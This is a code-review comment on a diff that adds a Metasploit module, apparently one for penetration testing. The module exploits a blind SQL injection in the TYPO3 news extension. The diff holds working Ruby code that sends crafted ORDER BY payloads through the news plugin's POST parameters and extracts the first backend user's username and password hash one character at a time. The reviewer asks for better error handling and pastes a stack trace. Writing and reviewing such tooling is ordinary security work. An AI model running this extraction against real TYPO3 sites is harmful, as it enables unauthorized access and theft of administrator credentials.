modules/auxiliary/admin/http/typo3_news_module_sqli.rb

```diff
@@ -0,0 +1,176 @@
+    ascii_charset_lower = "a".upto("z").to_a.join('')
+    ascii_charset_upper = "A".upto("Z").to_a.join('')
+    ascii_charset = "#{ascii_charset_lower}#{ascii_charset_upper}"
+    digit_charset = "0".upto("9").to_a.join('')
+    full_charset = "#{ascii_charset_lower}#{ascii_charset_upper}#{digit_charset}$./"
+    username = blind('username','be_users', 'uid=1', ascii_charset, digit_charset, patterns)
+    print_good("Username: #{username}")
+    password = blind('password','be_users', 'uid=1', full_charset, digit_charset, patterns)
+    print_good("Password Hash: #{password}")
+  end
+
+  def blind(field, table, condition, charset, digit_charset, patterns = {})
+    # Adding 9 so that the result has two digits, If the lenght is superior to 100-9 it won't work
+    offset = 9
+    size = blind_size(
+     "length(#{field})+#{offset}",
+     table,
+     condition,
+     2,
+     digit_charset,
+     patterns
+    )
+    size = size.to_i - offset
+    data = blind_size(
+     field,
+     table,
+     condition,
+     size,
+     charset,
+     patterns
+    )
+    return data
+  end
+
+  def select_position(field, table, condition, position, char)
+    payload1 = "select(#{field})from(#{table})where(#{condition})"
+    payload2 = "ord(substring((#{payload1})from(#{position})for(1)))"
+    payload3 = "uid*(case((#{payload2})=#{char.ord})when(1)then(1)else(-1)end)"
+    return payload3
+  end
+
+  def blind_size(field, table, condition, size, charset,  patterns = {})
+    str = ""
+    for position in 0..size
+      for char in charset.split('')
+        payload = select_position(field, table, condition, position + 1, char)
+        #print_status(payload)
+        if test(payload, patterns)
+          str += char.to_s
+          #print_status(str)
+          break
+        end
+      end
+    end
+    return str
+  end
+
+  def test(payload, patterns = {})
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path,'index.php'),
+      'vars_get' => {
+        'id' => datastore['ID'],
+        'no_cache' => '1'
+       },
+       'vars_post' => {
+         'tx_news_pi1[overwriteDemand][OrderByAllowed]' => payload,
+         'tx_news_pi1[search][maximumDate]' => '', # Not required
+         'tx_news_pi1[overwriteDemand][order]' => payload,
+         'tx_news_pi1[search][subject]' => '',
+         'tx_news_pi1[search][minimumDate]' => '' # Not required
+       }
+    })
+    return res.body.index(patterns[:pattern1]) < res.body.index(patterns[:pattern2])
+  end
+
+  def try_autodetect_patterns()
+    print_status("Trying to automatically determine Pattern1 and Pattern2...")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path,'index.php'),
+      'vars_get' => {
+        'id' => datastore['ID'],
+        'no_cache' => '1'
+       }
+    })
+    news = res.get_html_document.search('div[@itemtype="http://schema.org/Article"]');
```

Comment:
Consider warning the user and failing gracefully if no news items are identified on the page with the specified ID.

I get:

```
[*] Trying to automatically determine Pattern1 and Pattern2...
[-] Auxiliary failed: NoMethodError undefined method `search' for nil:NilClass
[-] Call stack:
[-]   /pentest/exploit/metasploit-framework/modules/auxiliary/admin/http/typo3_news_module_sqli.rb:152:in `try_autodetect_patterns'
[-]   /pentest/exploit/metasploit-framework/modules/auxiliary/admin/http/typo3_news_module_sqli.rb:168:in `run'
[*] Auxiliary module execution completed
```